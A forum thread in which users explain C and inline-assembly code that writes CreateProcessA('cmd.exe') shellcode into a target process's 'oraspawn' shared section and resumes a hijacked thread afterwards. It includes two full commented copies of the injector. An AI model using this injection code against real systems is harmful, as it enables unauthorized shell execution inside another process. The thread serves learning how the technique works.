一段shellcode注入的汇编代码,谁能帮忙分析一下其中的地址变换,急用!在线等

once_athief 2009-03-26 03:54:05
rt,它是把shellcode代码放入共享内存的过程是怎样的?希望有地址变换过程的详细分析

#include <windows.h>
#include <stdio.h>


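/*
 * Write the CreateProcessA("cmd.exe") payload into the shared section owned by
 * the target process.  This function only prepares the memory: the payload is
 * run later by a thread of that process whose EIP gets redirected to it (that
 * part is outside this function), and the payload resumes that thread at oldEIP.
 *
 * Parameters
 *   oldEIP - address the hijacked thread continues at after CreateProcessA
 *            returns; stored at payload+0x0e and reached by `push [edx-0x4b] / ret`.
 *   oSID   - suffix of the section name "Global\*oraspawn_buffer_<oSID>*";
 *            only the first 50 characters are used (strncat), so a longer value
 *            silently yields a different name and OpenFileMapping fails.
 * Returns  TRUE when the payload was written; FALSE when Kernel32/CreateProcessA
 *          cannot be resolved, the section cannot be opened or mapped, or the
 *          command line does not fit the CommandBuf placeholder.
 *
 * Layout written into the section (base = address of the view):
 *   base+0x500  payload = the bytes between Shellcode: and End:
 *   base+0x50a  CreateProcessA pointer  (payload+0x0a, overwrites placeholder movs)
 *   base+0x50e  oldEIP                  (payload+0x0e)
 *   base+0x512  "cmd.exe\0"             (payload+0x12 = CommandBuf, 66-byte placeholder)
 *   base+0x559  getDelta                (payload+0x59 = what `pop edx` yields)
 *   base+0x759  PROCESS_INFORMATION     (edx+0x200)
 *   base+0x7f0  "WinSta0\Default\0"     (lpDesktop, located as (edx & ~0xff)+0x2f0)
 *   base+0x959  STARTUPINFO             (edx+0x400)
 *
 * The displacements are fixed by x86 encoding sizes inside the payload:
 *   jmp Start (short) = 2, then 4 * (mov ax,imm16 = 4)          -> CommandBuf = +0x12
 *   then 11 * (mov dword ptr [eax],imm32 = 6)                    -> Start      = +0x54
 *   then call rel32 = 5                                          -> getDelta   = +0x59
 * hence edx-0x4f = +0x0a, edx-0x4b = +0x0e, edx-0x47 = +0x12.  Do not reorder,
 * add or resize anything between Shellcode: and End: without recomputing them.
 *
 * Assumptions the payload relies on that this function cannot enforce:
 *   - the target maps the section at a 256-byte aligned address (xor bl,bl
 *     rebuilds base+0x500 from edx) and with execute permission;
 *   - Kernel32 has the same base in the target as in this process, so the
 *     CreateProcessA address resolved here is valid there;
 *   - the section is zero-filled and extends past base+0x959+sizeof(STARTUPINFO):
 *     STARTUPINFO (including cb) is never initialised, only lpDesktop is stored.
 */
BOOL InjectShellcode(DWORD oldEIP,CHAR * oSID)
{
HMODULE hKernel;
FARPROC pCreateProc;
LPSTR sCommand="cmd.exe";
DWORD dwStrLen;
CHAR buff[100];
HANDLE hMapFile;
LPVOID lpMapAddress;
BOOL fits = TRUE;   // cleared by the asm block if the command line is too long

dwStrLen=strlen(sCommand);

hKernel=LoadLibrary("Kernel32.dll");
if (hKernel == NULL) {
printf("Could not load Kernel32.dll\n\n");
return FALSE;
}
pCreateProc=GetProcAddress(hKernel,"CreateProcessA");
if (pCreateProc == NULL) {
printf("Could not resolve CreateProcessA\n\n");
FreeLibrary(hKernel);
return FALSE;
}

// "Global\*oraspawn_buffer_" is 24 chars: 24 + 50 (max oSID) + "*" + NUL = 76 <= 100
strcpy(buff, "Global\\*oraspawn_buffer_");
strncat(buff, oSID,50);
strcat(buff, "*");

hMapFile = OpenFileMapping(FILE_MAP_WRITE, FALSE,buff);

if (hMapFile == NULL) {
printf("Could not open Shared Section\n\n");
FreeLibrary(hKernel);
return FALSE;
}
else
printf("Shared Section opened\n");

// Map the whole section into this process; a NULL here used to be dereferenced
// as 0x500 by the copy loop below.
lpMapAddress = MapViewOfFile(hMapFile, FILE_MAP_WRITE,0,0,0);
if (lpMapAddress == NULL) {
printf("Could not map Shared Section\n\n");
CloseHandle(hMapFile);
FreeLibrary(hKernel);
return FALSE;
}

printf("Inserting shellcode...\n");

CHAR sWinSta[]="WinSta0\\Default";
DWORD dwWinStaLen = sizeof(sWinSta);   // 16: the NUL terminator is copied as well

//copy shellcode
_asm {

pushad

// Bounds check: the command line plus its NUL must fit in the CommandBuf
// placeholder (Start - CommandBuf bytes) or the copy would clobber Start:.
lea eax, Start
lea ecx, CommandBuf
sub eax, ecx                // eax = bytes available in the placeholder
mov ecx, dwStrLen
inc ecx                     // ecx = strlen + NUL
cmp ecx, eax
jbe CopyPayload             // unsigned compare on lengths
mov fits, 0
jmp Done

CopyPayload:
lea esi, Shellcode
mov edi, lpMapAddress
add edi, 0x500              // payload lives at section+0x500
lea ecx, End
sub ecx, esi                // ecx = payload length (End - Shellcode)
push esi
push edi
cld
rep movsb                   // copy the payload bytes into the section

pop edi                     // edi = payload start in the section
pop esi                     // esi = Shellcode label in this process
push edi

lea ecx, CommandBuf
sub ecx, esi                // ecx = offset of CommandBuf inside the payload (0x12)
add edi, ecx
mov esi, sCommand
mov ecx, dwStrLen
rep movsb                   // "cmd.exe"
mov byte ptr [edi], 0x00    // NUL terminator for lpCommandLine

pop edi                     // back to payload start
mov esi, pCreateProc
mov [edi+0x0a], esi         // read by `call [edx-0x4f]` in the payload

mov esi, oldEIP
mov [edi+0x0e], esi         // read by `push [edx-0x4b]` in the payload

add edi, 0x2f0              // lpDesktop string, found by the payload as (edx & ~0xff)+0x2f0
lea esi, sWinSta
mov ecx, dwWinStaLen        // strlen("WinSta0\Default") + NUL
cld
rep movsb

jmp Done

// ---- payload: copied verbatim, offsets below depend on these exact bytes ----
Shellcode:
jmp Start
// placeholder data: +0x0a..+0x0d CreateProcessA pointer, +0x0e..+0x11 oldEIP
mov ax,0xffff
mov ax,0xffff
mov ax,0xffff
mov ax,0xffff

CommandBuf: // placeholder data: lpCommandLine string (11 * 6 = 66 bytes)
mov dword ptr[eax],0x55555555
mov dword ptr[eax],0x55555555
mov dword ptr[eax],0x55555555
mov dword ptr[eax],0x55555555
mov dword ptr[eax],0x55555555
mov dword ptr[eax],0x55555555
mov dword ptr[eax],0x55555555
mov dword ptr[eax],0x55555555
mov dword ptr[eax],0x55555555
mov dword ptr[eax],0x55555555
mov dword ptr[eax],0x55555555
Start:
call getDelta
getDelta:
pop edx // edx = runtime address of getDelta (payload+0x59) wherever the section is mapped
pushad

mov eax, edx
add eax, 0x200
push eax // lpProcessInformation (edx+0x200)
add eax, 0x200
mov ebx, edx
xor bl, bl // payload start: requires payload+0x59 to have low byte 0x59, i.e. a 256-aligned payload
lea ecx, [ebx+0x2f0] // "WinSta0\Default" written by the injector
lea ebx, [eax+0x8] // STARTUPINFO.lpDesktop (cb at 0, lpReserved at 4)
mov [ebx], ecx // set windows station and desktop; rest of STARTUPINFO left as-is
push eax // lpStartupInfo (edx+0x400)
push 0x0 // lpCurrentDirectory
push 0x0 // lpEnvironment
push 0x0 // dwCreationFlags
push 0x0 // bInheritHandles
push 0x0 // lpThreadAttributes
push 0x0 // lpProcessAttributes

lea eax, [edx-0x47] // lpCommandLine = CommandBuf (payload+0x12)
push eax

push 0x0 // lpApplicationName
call [edx-0x4f] // CreateProcessA pointer stored at payload+0x0a (stdcall: callee pops 10 args)

popad

push [edx-0x4b] // oldEIP stored at payload+0x0e
ret // resume the hijacked thread
End:

Done:
popad
}

// The injector only needed its own view to write the payload; release it.
UnmapViewOfFile(lpMapAddress);
CloseHandle(hMapFile);
FreeLibrary(hKernel);

if (!fits) {
printf("Command line does not fit the shellcode buffer\n\n");
return FALSE;
}

return TRUE;

}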
once_athief 2009-03-27
恩,主要是我对汇编基本上一窍不通,现在总算明白了大体流程,占位指令比较有意思啊,是用shellcode代码自身占用的内存来保存变量??
killbug2004 2009-03-27
/*
 * Write the CreateProcessA("cmd.exe") payload into the shared section of the
 * target process.  oldEIP is where the hijacked thread resumes afterwards
 * (stored at payload+0x0e); oSID is the suffix of the section name
 * "Global\*oraspawn_buffer_<oSID>*" (at most 50 characters are used).
 * Returns FALSE only when the section cannot be opened, TRUE otherwise.
 *
 * Every displacement below follows from x86 encoding sizes inside Shellcode:..End:
 *   jmp Start (short) 2 + 4 * (mov ax,imm16 = 4)        -> CommandBuf = payload+0x12
 *   + 11 * (mov dword ptr [eax],imm32 = 6)              -> Start      = payload+0x54
 *   + call rel32 5                                      -> getDelta   = payload+0x59
 * so edx-0x4f = +0x0a, edx-0x4b = +0x0e, edx-0x47 = +0x12.
 */
BOOL InjectShellcode(DWORD oldEIP,CHAR * oSID)
{
HMODULE hKernel;
FARPROC pCreateProc;
LPSTR sCommand="cmd.exe";
DWORD dwStrLen;
CHAR buff[100]; // 24 (prefix) + 50 (oSID max) + 1 ("*") + NUL = 76, fits

dwStrLen=strlen(sCommand);

hKernel=LoadLibrary("Kernel32.dll");
// NOTE(review): neither result is checked; the pointer is resolved in this process
// and assumed to be valid in the target (same Kernel32 base).
pCreateProc=GetProcAddress(hKernel,"CreateProcessA");

strcpy(buff, "Global\\*oraspawn_buffer_");
strncat(buff, oSID,50);
strcat(buff, "*");

HANDLE hMapFile = OpenFileMapping(FILE_MAP_WRITE, FALSE,buff); // open the existing shared section (handle is never closed)

if (hMapFile == NULL) {
printf("Could not open Shared Section\n\n");
return FALSE;
}
else
printf("Shared Section opened\n");

// Map the section into this process. NOTE(review): a NULL return is not checked,
// the copy below would then write to address 0x500.
LPVOID lpMapAddress = MapViewOfFile(hMapFile, FILE_MAP_WRITE,0,0,0);

printf("Inserting shellcode...\n");

CHAR sWinSta[]="WinSta0\\Default";

//copy shellcode
_asm {

pushad

lea esi, Shellcode
mov edi, lpMapAddress
add edi, 0x500 // payload is placed at section+0x500
lea ecx, End
sub ecx, esi; payload length = End - Shellcode
push esi; keep the source label for the offset arithmetic below
push edi; keep the destination (payload start in the section)
cld
rep movsb; copy the payload bytes into the shared section

pop edi
pop esi
push edi

lea ecx, CommandBuf; placeholder that receives lpCommandLine, CreateProcessA's second argument
sub ecx, esi; ecx = CommandBuf - Shellcode = 0x12
add edi, ecx
mov esi, sCommand; "cmd.exe"
mov ecx, dwStrLen
rep movsb; copy "cmd.exe" into the CommandBuf placeholder
mov [edi], 0x00; terminating NUL

pop edi
mov esi, pCreateProc
mov [edi+0x0a], esi; payload+0x0a = CreateProcessA address, read by `call [edx-0x4f]`

mov esi, oldEIP
mov [edi+0x0e], esi; payload+0x0e = EIP to resume at, read by `push [edx-0x4b]`

add edi, 0x2f0; copy "WinSta0\Default" to payload+0x2f0 (section+0x7f0)
lea esi, sWinSta
mov ecx, 0xf; 15 = strlen only; NOTE(review): the NUL is not copied, relies on zero-filled memory
cld
rep movsb

jmp Done

Shellcode:
jmp Start
// placeholder data, overwritten by the injector: +0x0a CreateProcessA, +0x0e oldEIP
mov ax,0xffff; never executed, reserves bytes
mov ax,0xffff
mov ax,0xffff
mov ax,0xffff

CommandBuf: // placeholder data, overwritten by the injector
mov dword ptr[eax],0x55555555; never executed: 11 * 6 = 66 bytes of buffer for "cmd.exe"
mov dword ptr[eax],0x55555555
mov dword ptr[eax],0x55555555
mov dword ptr[eax],0x55555555
mov dword ptr[eax],0x55555555
mov dword ptr[eax],0x55555555
mov dword ptr[eax],0x55555555
mov dword ptr[eax],0x55555555
mov dword ptr[eax],0x55555555
mov dword ptr[eax],0x55555555
mov dword ptr[eax],0x55555555
Start:
call getDelta
getDelta:
pop edx // edx = runtime address of getDelta (payload+0x59) in whatever process runs this
pushad

mov eax, edx
add eax, 0x200
push eax //lpProcessInformation at edx+0x200
add eax, 0x200
mov ebx, edx
xor bl, bl; clear low byte -> payload start; only valid if the payload is 256-byte aligned
lea ecx, [ebx+0x2f0]; -> "WinSta0\Default" written by the injector
lea ebx, [eax+0x8] ; STARTUPINFO.lpDesktop (cb at +0, lpReserved at +4)
mov [ebx], ecx // set window station and desktop; NOTE(review): cb and the rest of STARTUPINFO are never initialised
push eax //lpStartupInfo at edx+0x400
push 0x0 // lpCurrentDirectory
push 0x0 // lpEnvironment
push 0x0 // dwCreationFlags
push 0x0 // bInheritHandles
push 0x0 // lpThreadAttributes
push 0x0 // lpProcessAttributes

lea eax, [edx-0x47] // lpCommandLine = CommandBuf (payload+0x12)
push eax

push 0x0 // lpApplicationName
call [edx-0x4f] // CreateProcessA pointer at payload+0x0a; stdcall, callee pops the 10 arguments

popad

push [edx-0x4b] // oldEIP stored at payload+0x0e
ret // resume the hijacked thread there
End:

Done:
popad
}

return TRUE;

}


这个代码不太难
changhe325 2009-03-27
学习!
killbug2004 2009-03-27
是的，那些指令不会被执行：内联汇编里没有 db/dd 这类数据伪指令，所以用执行不到的指令在代码中间留出一段固定大小的空间，运行时再由注入器覆盖成数据（CreateProcessA 的地址、旧 EIP 和 "cmd.exe" 字符串）。注意这些占位区的大小决定了 [edx-0x4f]、[edx-0x4b]、[edx-0x47] 这几个偏移，增删占位指令就必须重新计算。
once_athief 2009-03-26
谢谢回复,下面这一段被jmp过了,什么时候会执行呢?还有这一段是在做什么?

// this gets overwritten
mov ax,0xffff
mov ax,0xffff
mov ax,0xffff
mov ax,0xffff

CommandBuf: // this gets overwritten
mov dword ptr[eax],0x55555555
mov dword ptr[eax],0x55555555
mov dword ptr[eax],0x55555555
mov dword ptr[eax],0x55555555
mov dword ptr[eax],0x55555555
mov dword ptr[eax],0x55555555
mov dword ptr[eax],0x55555555
mov dword ptr[eax],0x55555555
mov dword ptr[eax],0x55555555
mov dword ptr[eax],0x55555555
mov dword ptr[eax],0x55555555
once_athief 2009-03-26
这里重定位技术是指它向指定地址写入shellcode的过程吗?
killbug2004 2009-03-26
lea esi, Shellcode;这里是复制shellcode到内存共享区域
mov edi, lpMapAddress
add edi, 0x500
lea ecx, End
sub ecx, esi
push esi
push edi
cld
rep movsb

pop edi
pop esi
push edi

lea ecx, CommandBuf ;定位CommandBuf占位区,这里存放的是CreateProcessA的第二个参数lpCommandLine("cmd.exe")
sub ecx, esi
add edi, ecx
mov esi, sCommand
mov ecx, dwStrLen
rep movsb
mov [edi], 0x00

pop edi ;恢复edi=payload在共享内存中的起始地址,下面按固定偏移填入两个指针
mov esi, pCreateProc
mov [edi+0x0a], esi

mov esi, oldEIP
mov [edi+0x0e], esi ;填入旧EIP,由payload末尾的push [edx-0x4b]/ret用来返回原线程

add edi, 0x2f0
lea esi, sWinSta
mov ecx, 0xf
cld
rep movsb


这就是经典的 call/pop 取自身地址（getDelta）的重定位技巧：注入器只是把代码连同占位区整体复制到共享内存 +0x500 处，并按固定偏移填入 CreateProcessA 地址、旧 EIP、命令行和桌面名；payload 运行时不依赖任何编译期地址，所有数据都用 edx（getDelta 的运行时地址）加减固定偏移来访问，因此目标进程无论把这段内存映射到哪里都能工作（前提是 payload 起始地址按 256 字节对齐，否则 xor bl,bl 算不回起始地址）。
cnzdgs 2009-03-26
call getDelta
getDelta:
pop edx // Get shellcode/shared section pointer

call指令把下一条指令的地址压栈再跳转到目标地址，这里压栈的正是getDelta标号的地址；紧接着pop edx把它弹到edx里，于是edx保存的就是getDelta在当前进程、当前映射位置上的运行时地址（也就是payload在目标进程共享内存中的地址，而不是注入器里的地址）。后面的[edx-0x4f]、[edx-0x4b]、[edx-0x47]都以它为基准去找CreateProcessA指针、旧EIP和命令行字符串。
